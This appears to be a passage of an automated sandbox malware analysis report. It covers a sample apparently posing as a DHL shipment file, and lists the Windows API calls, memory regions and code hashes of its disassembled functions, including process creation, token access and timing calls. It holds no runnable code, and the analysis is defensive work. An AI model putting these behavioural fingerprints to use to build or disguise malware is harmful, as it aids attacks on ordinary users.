                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 008D12D8
                                                                                  • GetClientRect.USER32(?,?), ref: 0090B84B
                                                                                  • GetCursorPos.USER32(?), ref: 0090B855
                                                                                  • ScreenToClient.USER32(?,?), ref: 0090B860
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4127811313-0
                                                                                  • Opcode ID: 579b2f6ddd071662e310177520dda3e94cfd9b366226bbc135a2744625d5a047
                                                                                  • Instruction ID: 03d24d2a1ccc9487e5ff16f126f3de375634f2ccc9c22ae906c3bd9ebc9b51ff
                                                                                  • Opcode Fuzzy Hash: 579b2f6ddd071662e310177520dda3e94cfd9b366226bbc135a2744625d5a047
                                                                                  • Instruction Fuzzy Hash: C0115535A10119BFCF00EFA9D8899BE77B9FF05311F000556F901E3250D731AA519BA6
                                                                                  APIs
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 0093166F
                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 00931694
                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 0093169E
                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,009301FD,?,00931250,?,00008000), ref: 009316D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                  • String ID:
                                                                                  • API String ID: 2875609808-0
                                                                                  • Opcode ID: a86d2c8d712de97ce443eb2cbf8354a17357d9009e61c8a985123a9c83dae9d5
                                                                                  • Instruction ID: 0a8249b35282ba83904329bff9db0212b1c894d5442070127d2666fbae45815c
                                                                                  • Opcode Fuzzy Hash: a86d2c8d712de97ce443eb2cbf8354a17357d9009e61c8a985123a9c83dae9d5
                                                                                  • Instruction Fuzzy Hash: 4B118E31C19A1DDBCF00AFE6D85AAEEBB78FF09716F044055E940B2250CB3055609FD6
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction ID: 50feec98bb02685a66ee99191c3714038b3b2e333de5373225d2bacb1f164c80
                                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                  • Instruction Fuzzy Hash: 5001403684414EBFCF525FC8CC018EE7F66BF59361B588515FA2898071D237E9B1AB81
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 0095B59E
                                                                                  • ScreenToClient.USER32(?,?), ref: 0095B5B6
                                                                                  • ScreenToClient.USER32(?,?), ref: 0095B5DA
                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0095B5F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 357397906-0
                                                                                  • Opcode ID: d699e4bef185bfb73447fbc1799b5ccf32507646214166304f749e0f740a8098
                                                                                  • Instruction ID: 45db50ad3ecf49609e8eeb2f93bf6b93c9a0177b6e350097ff796e382a47d646
                                                                                  • Opcode Fuzzy Hash: d699e4bef185bfb73447fbc1799b5ccf32507646214166304f749e0f740a8098
                                                                                  • Instruction Fuzzy Hash: A91143B9D0520DEFDB41CFA9C8849EEFBB9FB08311F108166E914E3220D735AA559F90
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0095B8FE
                                                                                  • _memset.LIBCMT ref: 0095B90D
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00997F20,00997F64), ref: 0095B93C
                                                                                  • CloseHandle.KERNEL32 ref: 0095B94E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3277943733-0
                                                                                  • Opcode ID: fe0cf9e19f27710dba5f2ffccae03677ba3d6db99ee6ffcda8473b32dae80e09
                                                                                  • Instruction ID: 58e3c4c0585d91f5852d6419ebf3f165516767347c61c2482da2c82a212693b5
                                                                                  • Opcode Fuzzy Hash: fe0cf9e19f27710dba5f2ffccae03677ba3d6db99ee6ffcda8473b32dae80e09
                                                                                  • Instruction Fuzzy Hash: 07F054B25683047BF61027B9AC05F7BBA9CEB09355F000022BB08F51A1DB71490097B9
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00936E88
                                                                                    • Part of subcall function 0093794E: _memset.LIBCMT ref: 00937983
                                                                                  • _memmove.LIBCMT ref: 00936EAB
                                                                                  • _memset.LIBCMT ref: 00936EB8
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00936EC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 48991266-0
                                                                                  • Opcode ID: 57e41c5e726ba1d3e1f9600a050de37cf1740896fc2ed57213395a360d6ebe5f
                                                                                  • Instruction ID: 7b443750da0e5bb8b4840ca9a520a7b103ba4976f4337b7caa1e78eb3eaba952
                                                                                  • Opcode Fuzzy Hash: 57e41c5e726ba1d3e1f9600a050de37cf1740896fc2ed57213395a360d6ebe5f
                                                                                  • Instruction Fuzzy Hash: A5F0547A104204ABCF016F55EC85B5ABB2AEF85331F048061FE089E216CB31E911DBB5
                                                                                  APIs
                                                                                    • Part of subcall function 008D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
                                                                                    • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D135C
                                                                                    • Part of subcall function 008D12F3: BeginPath.GDI32(?), ref: 008D1373
                                                                                    • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D139C
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095C030
                                                                                  • LineTo.GDI32(00000000,?,?), ref: 0095C03D
                                                                                  • EndPath.GDI32(00000000), ref: 0095C04D
                                                                                  • StrokePath.GDI32(00000000), ref: 0095C05B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 1539411459-0
                                                                                  • Opcode ID: e58f6793d579b1a73c9c6a321423bc340464137b5d29a13cb080c55b5b79be95
                                                                                  • Instruction ID: 4ba7b46bc202bbc4ca189d3107df04a7f388fbf9e3dfd7cfaf6c2c80c294844d
                                                                                  • Opcode Fuzzy Hash: e58f6793d579b1a73c9c6a321423bc340464137b5d29a13cb080c55b5b79be95
                                                                                  • Instruction Fuzzy Hash: 7FF05E32019359BBDB126F66AC0DFCE3F99AF05322F084041FA11610E287765655EB95
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092A399
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092A3AC
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0092A3B3
                                                                                  • AttachThreadInput.USER32(00000000), ref: 0092A3BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  • Opcode ID: e1632420bde5400da70a55caee6e4cec00feafaaf5cca2b0203d0856f1a593f0
                                                                                  • Instruction ID: e030ebeaa1d8e0d8fe0f96d38a1bccfa9038d48f72998930b422d6f6651f8ef3
                                                                                  • Opcode Fuzzy Hash: e1632420bde5400da70a55caee6e4cec00feafaaf5cca2b0203d0856f1a593f0
                                                                                  • Instruction Fuzzy Hash: A3E0C93254A338BBDB205BA2EC1DED77F5CEF167B2F008025F50995061C6758540EBA1
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 008D2231
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 008D223B
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 008D2250
                                                                                  • GetStockObject.GDI32(00000005), ref: 008D2258
                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0090C0D3
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0090C0E0
                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0090C0F9
                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0090C112
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0090C132
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0090C13D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1946975507-0
                                                                                  • Opcode ID: 3d13aad587642c60d34225dbb1164a027fcc18088846611f08c157310b3cddf9
                                                                                  • Instruction ID: bb8df2bcfcfe8eacbd397610e7cafb7482f6f4a3abeace38bc7e96c3b08200ee
                                                                                  • Opcode Fuzzy Hash: 3d13aad587642c60d34225dbb1164a027fcc18088846611f08c157310b3cddf9
                                                                                  • Instruction Fuzzy Hash: 7EE06D32118644EEDF215F75FC0DBE87B24EB15337F008366FAA9880E187714980EB11
                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 00928C63
                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0092882E), ref: 00928C6A
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0092882E), ref: 00928C77
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0092882E), ref: 00928C7E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                  • String ID:
                                                                                  • API String ID: 3974789173-0
                                                                                  • Opcode ID: 3b285bfec36db69dc6259576304a74f0e2e998115b5503db8568a10d7c62b68e
                                                                                  • Instruction ID: 2149930eb374ee11bcc46ade4f8fdef31c842e63e0847fc13e1ee9b1321c0d1e
                                                                                  • Opcode Fuzzy Hash: 3b285bfec36db69dc6259576304a74f0e2e998115b5503db8568a10d7c62b68e
                                                                                  • Instruction Fuzzy Hash: C2E04F766563219BD7205FB26D0CB573BACAF507A3F084828E285DA080DA3484469B61
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 00912187
                                                                                  • GetDC.USER32(00000000), ref: 00912191
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009121B1
                                                                                  • ReleaseDC.USER32(?), ref: 009121D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: 53a6db4ab56a91d51f71ec3871b1af0890a87277f33c41dcb96ddb4702d06f44
                                                                                  • Instruction ID: b5dd09ccb19f8fcf9419e4143687c996df38310b0de1e38845d125809d5bdb3f
                                                                                  • Opcode Fuzzy Hash: 53a6db4ab56a91d51f71ec3871b1af0890a87277f33c41dcb96ddb4702d06f44
                                                                                  • Instruction Fuzzy Hash: EAE0E575815218EFDF019F65C818A9D7BB1FB4C362F108426F95AD7260DB388141AF40
                                                                                  APIs
                                                                                  • GetDesktopWindow.USER32 ref: 0091219B
                                                                                  • GetDC.USER32(00000000), ref: 009121A5
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009121B1
                                                                                  • ReleaseDC.USER32(?), ref: 009121D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: f9cc9678b2b2b8c5de61d517dcd0ef41cad7e502ef2ebbad9e35816c17e89dc6
                                                                                  • Instruction ID: d263022b694de0612c51030fae312d5fdbf13dc65630a9f6cd20f2335961c0ec
                                                                                  • Opcode Fuzzy Hash: f9cc9678b2b2b8c5de61d517dcd0ef41cad7e502ef2ebbad9e35816c17e89dc6
                                                                                  • Instruction Fuzzy Hash: CAE0E575815218AFCF019F75C81869D7BA1FB4C322F108025F95AD7260DB389141AF40
                                                                                  APIs
                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0092B981
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContainedObject
                                                                                  • String ID: AutoIt3GUI$Container
                                                                                  • API String ID: 3565006973-3941886329
                                                                                  • Opcode ID: f40634d59a5a48ff18e865f7fad6951578010b0ce3e28be462ba3fbabab3f58c
                                                                                  • Instruction ID: d4ede75b38e32853593a7d578d5830362cbc4d79ccbc7d06588ae1176134e5c5
                                                                                  • Opcode Fuzzy Hash: f40634d59a5a48ff18e865f7fad6951578010b0ce3e28be462ba3fbabab3f58c
                                                                                  • Instruction Fuzzy Hash: 88914874600611AFDB24DF28D884B6ABBE8FF48710F24856EF94ACB395DB70E840CB50
                                                                                  APIs
                                                                                    • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                                                                    • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                                                    • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                                                                  • __wcsnicmp.LIBCMT ref: 0093B298
                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0093B361
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                  • String ID: LPT
                                                                                  • API String ID: 3222508074-1350329615
                                                                                  • Opcode ID: 5ce80ca2a02dffdf98c78f2ac3c15712cba12a4cfdc90dca8ab212799c208d99
                                                                                  • Instruction ID: a18586d81db84e23d65d9573d0c84a2583e6d3ddf2fdea25287252dbbeb2c337
                                                                                  • Opcode Fuzzy Hash: 5ce80ca2a02dffdf98c78f2ac3c15712cba12a4cfdc90dca8ab212799c208d99
                                                                                  • Instruction Fuzzy Hash: A5618075A00215AFCB14EF58C895EAEB7B8FF08310F11455AFA46AB351DB70AE40CF51
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 008E2AC8
                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 008E2AE1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 2783356886-2766056989
                                                                                  • Opcode ID: cde099e30fcd4881c979679fbb11e8cf1c3e9f1930335c71f2b7d1931099cebf
                                                                                  • Instruction ID: d3deeebdd65cf07a098acdf2c68f0959c74e045e26f4d78fd8326464a69ab52e
                                                                                  • Opcode Fuzzy Hash: cde099e30fcd4881c979679fbb11e8cf1c3e9f1930335c71f2b7d1931099cebf
                                                                                  • Instruction Fuzzy Hash: 145149724187549BD320AF14DC86BAFBBE8FF84314F42895DF1D9911A1DB308969CB17
                                                                                  APIs
                                                                                    • Part of subcall function 008D506B: __fread_nolock.LIBCMT ref: 008D5089
                                                                                  • _wcscmp.LIBCMT ref: 00939AAE
                                                                                  • _wcscmp.LIBCMT ref: 00939AC1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                  • String ID: FILE
                                                                                  • API String ID: 4029003684-3121273764
                                                                                  • Opcode ID: d44468d34b05add16fd8f4abdb7c6f8c3f93d73d8df7f1f87dab173a80f86dca
                                                                                  • Instruction ID: ef3ffbdadb66cd9429189ac044ac68dcb712c089fd61023f2410428a8b3daed5
                                                                                  • Opcode Fuzzy Hash: d44468d34b05add16fd8f4abdb7c6f8c3f93d73d8df7f1f87dab173a80f86dca
                                                                                  • Instruction Fuzzy Hash: BC41B971A00619BBDF209AA4DC45FEFBBBDEF45714F00047AF900E7281D6B59E048BA2
                                                                                  APIs
